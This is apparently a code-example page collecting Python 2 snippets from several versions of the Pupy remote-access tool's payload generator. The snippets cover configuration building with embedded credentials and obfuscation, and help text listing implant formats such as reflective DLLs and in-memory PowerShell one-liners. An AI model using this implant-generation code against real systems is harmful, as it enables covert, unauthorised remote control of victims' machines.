Ejemplo n.º 1
0
def get_raw_conf(conf, obfuscate=False):
    credentials = Credentials(role='client')

    if not "offline_script" in conf:
        offline_script = ""
    else:
        offline_script = conf["offline_script"]

    obf_func = lambda x: x
    if obfuscate:
        obf_func = compress_encode_obfs

    l = launchers[conf['launcher']]()
    l.parse_args(conf['launcher_args'])

    required_credentials = set(l.credentials) \
      if hasattr(l, 'credentials') else set([])

    transport = l.get_transport()
    transports_list = []

    if transport:
        transports_list = [transport]
        if transports[transport].credentials:
            for name in transports[transport].credentials:
                required_credentials.add(name)
    elif not transport:
        for n, t in transports.iteritems():
            transports_list.append(n)

            if t.credentials:
                for name in t.credentials:
                    required_credentials.add(name)

    print colorize("[+] ", "red") + 'Required credentials:\n{}'.format(
        colorize("[+] ", "red") + ', '.join(required_credentials))

    embedded_credentials = '\n'.join([
        '{}={}'.format(credential, repr(credentials[credential])) \
        for credential in required_credentials if credentials[credential] is not None
    ])+'\n'

    config = '\n'.join([
        'pupyimporter.pupy_add_package({})'.format(
            repr(cPickle.dumps({'pupy_credentials.py':
                                embedded_credentials}))),
        '\n'.join([
            'pupyimporter.pupy_add_package({})'.format(
                repr(
                    cPickle.dumps(
                        gen_package_pickled_dic(
                            ROOT + os.sep,
                            'network.transports.{}'.format(transport)))))
            for transport in transports_list
        ]), 'import sys', 'sys.modules.pop("network.conf")',
        'import network.conf', 'LAUNCHER={}'.format(repr(conf['launcher'])),
        'LAUNCHER_ARGS={}'.format(repr(conf['launcher_args'])), offline_script
    ])

    return obf_func(config)
Ejemplo n.º 2
0
    def __call__(self, parser, namespace, values, option_string=None):
        print colorize("## available formats :",
                       "green") + " usage: -f <format>"
        print "\t- client           : generate client binary"
        print "\t- py               : generate a fully packaged python file (with all the dependencies packaged and executed from memory), all os (need the python interpreter installed)"
        print "\t- pyinst           : generate a python file compatible with pyinstaller"
        print "\t- py_oneliner      : same as \"py\" format but served over http to load it from memory with a single command line."
        print "\t- ps1              : generate ps1 file which embeds pupy dll (x86-x64) and inject it to current process."
        print "\t- ps1_oneliner     : load pupy remotely from memory with a single command line using powershell."
        print "\t- rubber_ducky     : generate a Rubber Ducky script and inject.bin file (Windows Only)."
        print ""
        print colorize("## available transports :",
                       "green") + " usage: -t <transport>"
        for name, tc in transports.iteritems():
            try:
                print "\t- {:<14} : {}".format(name, tc.info)
            except Exception as e:
                logging.error(e)

        print colorize(
            "## available scriptlets :",
            "green") + " usage: -s <scriptlet>,<arg1>=<value>,<args2=value>..."
        scriptlets_dic = load_scriptlets()
        for name, sc in scriptlets_dic.iteritems():
            print "\t- {:<15} : ".format(name)
            print '\n'.join(["\t" + x for x in sc.get_help().split("\n")])

        raise InvalidOptions
Ejemplo n.º 3
0
    def __call__(self, parser, namespace, values, option_string=None):
        print colorize("## available formats :",
                       "green") + " usage: -f <format>"
        print "\t- exe_86, exe_x64 : generate PE exe for windows"
        print "\t- dll_86, dll_x64 : generate reflective dll for windows"
        print "\t- py              : generate a fully packaged python file (with all the dependencies packaged and executed from memory), all os (need the python interpreter installed)"
        print "\t- py_oneliner     : same as \"py\" format but served over http to load it from memory with a single command line."
        print "\t- ps1_oneliner    : load pupy remotely from memory with a single command line using powershell."

        print ""
        print colorize("## available transports :",
                       "green") + " usage: -t <transport>"
        for name, tc in transports.iteritems():
            try:
                print "\t- {:<14} : {}".format(name, tc.info)
            except Exception as e:
                logging.error(e)

        print colorize(
            "## available scriptlets :",
            "green") + " usage: -s <scriptlet>,<arg1>=<value>,<args2=value>..."
        scriptlets_dic = load_scriptlets()
        for name, sc in scriptlets_dic.iteritems():
            print "\t- {:<15} : ".format(name)
            print '\n'.join(["\t" + x for x in sc.get_help().split("\n")])
        exit()
Ejemplo n.º 4
0
    def __call__(self, parser, namespace, values, option_string=None):
        print colorize("## available formats :", "green")+" usage: -f <format>"
        print "\t- exe_86, exe_x64  : generate PE exe for windows"
        print "\t- dll_86, dll_x64  : generate reflective dll for windows"
        print "\t- lin_x86, lin_x64 : generate a ELF binary for linux"
        print "\t- so_x86, so_x64   : generate a ELF .so for linux"
        print "\t- py               : generate a fully packaged python file (with all the dependencies packaged and executed from memory), all os (need the python interpreter installed)"
        print "\t- pyinst           : generate a python file compatible with pyinstaller"
        print "\t- py_oneliner      : same as \"py\" format but served over http to load it from memory with a single command line."
        print "\t- ps1              : generate ps1 file which embeds pupy dll (x86-x64) and inject it to current process."
        print "\t- ps1_oneliner     : load pupy remotely from memory with a single command line using powershell."
        print "\t- rubber_ducky     : generate a Rubber Ducky script and inject.bin file (Windows Only)."
        print "\t- apk              : generate a apk for running pupy on android"

        print ""
        print colorize("## available transports :","green")+" usage: -t <transport>"
        for name, tc in transports.iteritems():
            try:
                print "\t- {:<14} : {}".format(name, tc.info)
            except Exception as e:
                logging.error(e)

        print colorize("## available scriptlets :", "green")+" usage: -s <scriptlet>,<arg1>=<value>,<args2=value>..."
        scriptlets_dic=load_scriptlets()
        for name, sc in scriptlets_dic.iteritems():
            print "\t- {:<15} : ".format(name)
            print '\n'.join(["\t"+x for x in sc.get_help().split("\n")])
        exit()
Ejemplo n.º 5
0
def do(server, handler, config, args):
    if args.add:
        name, args = args.add[0], args.add[1:]
        server.add_listener(name, ' '.join(args), motd=False)
    elif args.add_no_pproxy:
        name, args = args.add_no_pproxy[0], args.add_no_pproxy[1:]
        server.add_listener(name,
                            ' '.join(args),
                            motd=False,
                            ignore_pproxy=True)
    elif args.remove:
        server.remove_listener(args.remove)

    elif args.list_transports:

        table = []

        for name, transport in transports.iteritems():
            color = None
            listener = None
            info = transport.info

            if name in server.listeners:
                color = 'lightgreen'
                listener = Color(str(server.listeners[name]), color)
                name = Color(name, color)
                info = Color(info, color)

            table.append({'NAME': name, 'INFO': info, 'ACTIVE': listener})

        handler.display(Table(table, ['NAME', 'INFO', 'ACTIVE']))

    else:
        for listener in server.listeners.itervalues():
            handler.display(Success(listener))
Ejemplo n.º 6
0
def pupygen(args, config, pupsrv, display):
    scriptlets = load_scriptlets(args.os, args.arch)

    if args.list:
        display(MultiPart([
            Table([{
                'FORMAT': f, 'DESCRIPTION': d
            } for f,d in {
                'client': 'generate client binary (linux/windows/apk/..)',
                'py': 'fully packaged python file',
                'py_oneliner': 'same as \'py\' format but served over http',
                'ps1': 'generate ps1 file which embeds pupy dll (x86-x64) and inject it to current process',
                'ps1_oneliner': 'load pupy remotely from memory with a single command line using powershell',
                'csharp': 'generate C# source (.cs) that executes pupy',
                '.NET': 'compile a C# payload into a windows executable.',
                '.NET_oneliner': 'Loads .NET assembly from memory via powershell'
            }.iteritems()], ['FORMAT', 'DESCRIPTION'], Color('Available formats (usage: -f <format>)', 'yellow')),

            Table([{
                'TRANSPORT': name, 'DESCRIPTION': t.info
            } for name, t in transports.iteritems()],
            ['TRANSPORT', 'DESCRIPTION'], Color('Available transports (usage: -t <transport>)', 'yellow')),

            Table([{
                'SCRIPTLET': name, 'DESCRIPTION': sc.description, 'ARGS': '; '.join(
                    '{}={}'.format(k,v) for k,v in sc.arguments.iteritems()
                )
            } for name, sc in scriptlets.iteritems()],
            ['SCRIPTLET', 'DESCRIPTION', 'ARGS'], Color(
                'Available scriptlets for {}/{} '
                '(usage: -s <scriptlet>[,arg1=value1,arg2=value2]'.format(
                    args.os or 'any', args.arch or 'any'), 'yellow'))
        ]))

        raise NoOutput()

    if args.workdir:
        os.chdir(args.workdir)

    script_code=""

    try:
        if args.scriptlet:
            script_code = pack_scriptlets(
                display,
                scriptlets,
                args.scriptlet,
                os=args.os,
                arch=args.arch,
                debug=args.debug_scriptlets)

    except ValueError, e:
        display(Error(e.message))
        raise NoOutput()
Ejemplo n.º 7
0
    def __call__(self, parser, namespace, values, option_string=None):
        print colorize("## available formats :", "green")
        print "\t- exe_86, exe_x64 : generate PE exe for windows"
        print "\t- dll_86, dll_x64 : generate reflective dll for windows"
        print "\t- py              : generate a fully packaged python file (with all the dependencies packaged and executed from memory), all os (need the python interpreter installed)"
        print "\t- py_oneliner     : same as \"py\" format but served over http to load it from a single command line"

        print ""
        print colorize("## available transports :","green")
        for name, dic in transports.iteritems():
            print "\t- {:<20} : {}".format(name, dic["info"])
        print ""
        print colorize("## available scriptlets :", "green")
        scriptlets_dic=load_scriptlets()
        for name, sc in scriptlets_dic.iteritems():
            print "\t- {:<15} : ".format(name)
            print '\n'.join(["\t"+x for x in sc.get_help().split("\n")])
        exit()
Ejemplo n.º 8
0
    def __call__(self, parser, namespace, values, option_string=None):
        print colorize("## available formats :", "green")
        print "\t- exe_86, exe_x64 : generate PE exe for windows"
        print "\t- dll_86, dll_x64 : generate reflective dll for windows"
        print "\t- py              : generate a fully packaged python file (with all the dependencies packaged and executed from memory), all os (need the python interpreter installed)"
        print "\t- py_oneliner     : same as \"py\" format but served over http to load it from a single command line"

        print ""
        print colorize("## available transports :", "green")
        for name, dic in transports.iteritems():
            print "\t- {:<20} : {}".format(name, dic["info"])
        print ""
        print colorize("## available scriptlets :", "green")
        scriptlets_dic = load_scriptlets()
        for name, sc in scriptlets_dic.iteritems():
            print "\t- {:<15} : ".format(name)
            print '\n'.join(["\t" + x for x in sc.get_help().split("\n")])
        exit()
Ejemplo n.º 9
0
    def __call__(self, parser, namespace, values, option_string=None):
        print colorize("## available formats :", "green")+" usage: -f <format>"
        print "\t- exe_86, exe_x64 : generate PE exe for windows"
        print "\t- dll_86, dll_x64 : generate reflective dll for windows"
        print "\t- py              : generate a fully packaged python file (with all the dependencies packaged and executed from memory), all os (need the python interpreter installed)"
        print "\t- py_oneliner     : same as \"py\" format but served over http to load it from memory with a single command line."
        print "\t- ps1_oneliner    : load pupy remotely from memory with a single command line using powershell."

        print ""
        print colorize("## available transports :","green")+" usage: -t <transport>"
        for name, tc in transports.iteritems():
            try:
                print "\t- {:<14} : {}".format(name, tc.info)
            except Exception as e:
                logging.error(e)

        print colorize("## available scriptlets :", "green")+" usage: -s <scriptlet>,<arg1>=<value>,<args2=value>..."
        scriptlets_dic=load_scriptlets()
        for name, sc in scriptlets_dic.iteritems():
            print "\t- {:<15} : ".format(name)
            print '\n'.join(["\t"+x for x in sc.get_help().split("\n")])
        exit()
Ejemplo n.º 10
0
MSG_TYPES_UNPACK = {}

KNOWN_NAMED_TUPLES = (Proxy, ProxyInfo, HostInfo, TransportInfo)


def register_named_tuple(code, type):
    MSG_TYPES_PACK[type] = lambda obj: Ext(code, packb(tuple(x for x in obj)))
    MSG_TYPES_UNPACK[code] = lambda obj: type(*unpackb(obj.data))


def register_string(type, code, name):
    MSG_TYPES_PACK[type] = lambda obj: Ext(code, '')
    MSG_TYPES_UNPACK[code] = lambda obj: name


for idx, type in enumerate(KNOWN_NAMED_TUPLES):
    register_named_tuple(idx, type)

SPECIAL_TYPES_OFFT = len(KNOWN_NAMED_TUPLES)

for idx, (name, type) in enumerate(transports.iteritems()):
    register_string(idx, type, name)

wrapext = namedtuple('Ext', ('code', 'data'))


def msgpack_exthook(code, data):
    if code in MSG_TYPES_UNPACK:
        obj = wrapext(code, data)
        return MSG_TYPES_UNPACK[code](obj)
Ejemplo n.º 11
0
def get_raw_conf(conf, obfuscate=False, verbose=False):
    credentials = Credentials(role='client')

    if not "offline_script" in conf:
        offline_script=""
    else:
        offline_script=conf["offline_script"]

    obf_func=lambda x:x
    if obfuscate:
        obf_func=compress_encode_obfs

    l = launchers[conf['launcher']]()
    l.parse_args(conf['launcher_args'])

    required_credentials = set(l.credentials) \
      if hasattr(l, 'credentials') else set([])

    transport = l.get_transport()
    transports_list = []

    if transport:
        transports_list = [ transport ]
        if transports[transport].credentials:
            for name in transports[transport].credentials:
                required_credentials.add(name)
    elif not transport:
        for n, t in transports.iteritems():
            transports_list.append(n)

            if t.credentials:
                for name in t.credentials:
                    required_credentials.add(name)

    print colorize("[+] ", "green") + 'Required credentials:\n{}'.format(
        colorize("[+] ", "green") + ', '.join(required_credentials)
    )

    embedded_credentials = '\n'.join([
        '{}={}'.format(credential, repr(credentials[credential])) \
        for credential in required_credentials if credentials[credential] is not None
    ])+'\n'

    if verbose:
        for k, v in conf.iteritems():
            print colorize("[C] {}: {}".format(k, v), "yellow")

    config = '\n'.join([
        'pupyimporter.pupy_add_package({})'.format(
            repr(cPickle.dumps({
                'pupy_credentials.py' : embedded_credentials
            }))),
        '\n'.join([
            'pupyimporter.pupy_add_package({})'.format(
                repr(cPickle.dumps(gen_package_pickled_dic(
                    ROOT+os.sep, 'network.transports.{}'.format(transport)
                    )))) for transport in transports_list
        ]),
        'import sys',
        'sys.modules.pop("network.conf")',
        'import network.conf',
        'LAUNCHER={}'.format(repr(conf['launcher'])),
        'LAUNCHER_ARGS={}'.format(repr(conf['launcher_args'])),
        'debug={}'.format(bool(conf.get('debug', False))),
        offline_script
    ])

    return obf_func(config)
Ejemplo n.º 12
0
def get_raw_conf(conf, obfuscate=False, verbose=False):

    credentials = Credentials(role='client')

    if not "offline_script" in conf:
        offline_script=""
    else:
        offline_script=conf["offline_script"]

    obf_func=lambda x:x
    if obfuscate:
        obf_func=compress_encode_obfs

    launcher = launchers[conf['launcher']]()
    launcher.parse_args(conf['launcher_args'])

    required_credentials = set(launcher.credentials) \
      if hasattr(launcher, 'credentials') else set([])

    transport = launcher.get_transport()
    transports_list = []

    if transport:
        transports_list = [ transport ]
        if transports[transport].credentials:
            for name in transports[transport].credentials:
                required_credentials.add(name)
    elif not transport:
        for n, t in transports.iteritems():
            transports_list.append(n)

            if t.credentials:
                for name in t.credentials:
                    required_credentials.add(name)

    available = []
    not_available = []

    for cred in required_credentials:
        if credentials[cred]:
            available.append(cred)
        else:
            not_available.append(cred)

    print colorize("[+] ", "green") + 'Required credentials (found):\n{}'.format(
        colorize("[+] ", "green") + ', '.join(available))

    if not_available:
        print colorize("[-] ", "red") + 'Required credentials (not found):\n{}'.format(
            colorize("[-] ", "red") + ', '.join(not_available))

    embedded_credentials = '\n'.join([
        '{}={}'.format(credential, repr(credentials[credential])) \
        for credential in required_credentials if credentials[credential] is not None
    ])+'\n'

    if verbose:
        for k, v in conf.iteritems():
            if k in ('offline_script'):
                continue

            print colorize("[C] {}: {}".format(k, v), "yellow")

    config = '\n'.join([
        'pupyimporter.pupy_add_package({})'.format(
            repr(cPickle.dumps({
                'pupy_credentials.pye' :
                bytes(pupycompile(embedded_credentials, obfuscate=True))
            }))),
        dependencies.importer(set(
            'network.transports.{}'.format(transport) for transport in transports_list
        ), path=ROOT),
        'import sys',
        'sys.modules.pop("network.conf")',
        'import network.conf',
        'LAUNCHER={}'.format(repr(conf['launcher'])),
        'LAUNCHER_ARGS={}'.format(repr(conf['launcher_args'])),
        'CONFIGURATION_CID={}'.format(conf.get('cid', 0x31338)),
        'pupy.cid = CONFIGURATION_CID',
        'debug={}'.format(bool(conf.get('debug', False))),
        offline_script
    ])

    return obf_func(config)
Ejemplo n.º 13
0
def get_raw_conf(display, conf, obfuscate=False, verbose=False):

    credentials = Credentials(role='client')

    if "offline_script" not in conf:
        offline_script=""
    else:
        offline_script=conf["offline_script"]

    launcher = launchers[conf['launcher']]()
    launcher.parse_args(conf['launcher_args'])

    required_credentials = set(launcher.credentials) \
      if hasattr(launcher, 'credentials') else set([])

    transport = launcher.get_transport()
    transports_list = []

    if transport:
        transports_list = [transport]
        if transports[transport].credentials:
            for name in transports[transport].credentials:
                required_credentials.add(name)
    elif not transport:
        for n, t in transports.iteritems():
            transports_list.append(n)

            if t.credentials:
                for name in t.credentials:
                    required_credentials.add(name)

    available = []
    not_available = []

    for cred in required_credentials:
        if credentials[cred]:
            available.append(cred)
        else:
            not_available.append(cred)

    display(
        List(available, bullet=Color('+', 'green'),
        caption=Success('Required credentials (found)')))

    if not_available:
        display(
            List(not_available, bullet=Color('-', 'red'),
            caption=Error('Required credentials (not found)')))

    embedded_credentials = '\n'.join([
        '{}={}'.format(credential, repr(credentials[credential])) \
        for credential in required_credentials if credentials[credential] is not None
    ])+'\n'

    if verbose:
        config_table = [{
            'KEY': k, 'VALUE': 'PRESENT' if (k in ('offline_script') and v) else (
                unicode(v) if type(v) not in (tuple,list,set) else ' '.join(
                    unicode(x) for x in v))
        } for k,v in conf.iteritems() if v]

        display(Table(config_table, ['KEY', 'VALUE'], Color('Configuration', 'yellow'), vspace=1))

    config = '\n'.join([
        'pupyimporter.pupy_add_package({})'.format(
            repr(cPickle.dumps({
                'pupy_credentials.pye':
                bytes(pupycompile(embedded_credentials, obfuscate=True))
            }))),
        dependencies.importer(set(
            'network.transports.{}'.format(transport) for transport in transports_list
        ), path=ROOT),
        'import sys',
        'sys.modules.pop("network.conf", "")',
        'import network.conf',
        'LAUNCHER={}'.format(repr(conf['launcher'])),
        'LAUNCHER_ARGS={}'.format(repr(conf['launcher_args'])),
        'CONFIGURATION_CID={}'.format(conf.get('cid', 0x31338)),
        'DELAYS={}'.format(repr(conf.get('delays', [
            (10, 5, 10), (50, 30, 50), (-1, 150, 300)]))),
        'pupy.cid = CONFIGURATION_CID',
        'debug={}'.format(bool(conf.get('debug', False))),
        'SCRIPTLETS={}'.format(repr(offline_script) if offline_script else '""')
    ])

    return compress_encode_obfs(config) if obfuscate else config
Ejemplo n.º 14
0
def get_raw_conf(display, conf, verbose=False):

    credentials = Credentials(role='client')

    if 'offline_script' not in conf:
        offline_script = ''
    else:
        offline_script = conf['offline_script']

    launcher = launchers[conf['launcher']]()
    launcher.parse_args(conf['launcher_args'])

    required_credentials = set(launcher.credentials) \
      if hasattr(launcher, 'credentials') else set([])

    transport = launcher.transport
    transports_list = []

    if transport:
        transports_list = [transport]
        if transports[transport].credentials:
            for name in transports[transport].credentials:
                required_credentials.add(name)

    elif not transport:
        for n, t in transports.iteritems():
            transports_list.append(n)

            if t.credentials:
                for name in t.credentials:
                    required_credentials.add(name)

    available = []
    not_available = []

    for cred in required_credentials:
        if credentials[cred]:
            available.append(cred)
        else:
            not_available.append(cred)

    display(
        List(available,
             bullet=Color('+', 'green'),
             caption=Success('Required credentials (found)')))

    if not_available:
        display(
            List(not_available,
                 bullet=Color('-', 'red'),
                 caption=Error('Required credentials (not found)')))

    embedded_credentials = {
        credential: credentials[credential]
        for credential in required_credentials
        if credentials[credential] is not None
    }

    if verbose:
        config_table = [{
            'KEY':
            k,
            'VALUE':
            'PRESENT' if (k in ('offline_script') and v) else
            (unicode(v) if type(v) not in (tuple, list, set) else ' '.join(
                unicode(x) for x in v))
        } for k, v in conf.iteritems() if v]

        display(
            Table(config_table, ['KEY', 'VALUE'],
                  Color('Configuration', 'yellow'),
                  vspace=1))

    config = {
        'credentials': embedded_credentials,
        'scriptlets': [offline_script] or [],
        'debug': conf.get('debug', False),
        'launcher': conf['launcher'],
        'launcher_args': conf['launcher_args'],
        'cid': conf.get('cid', 0x31338),
        'delays': conf.get('delays', [(10, 5, 10), (50, 30, 50),
                                      (-1, 150, 300)])
    }

    return config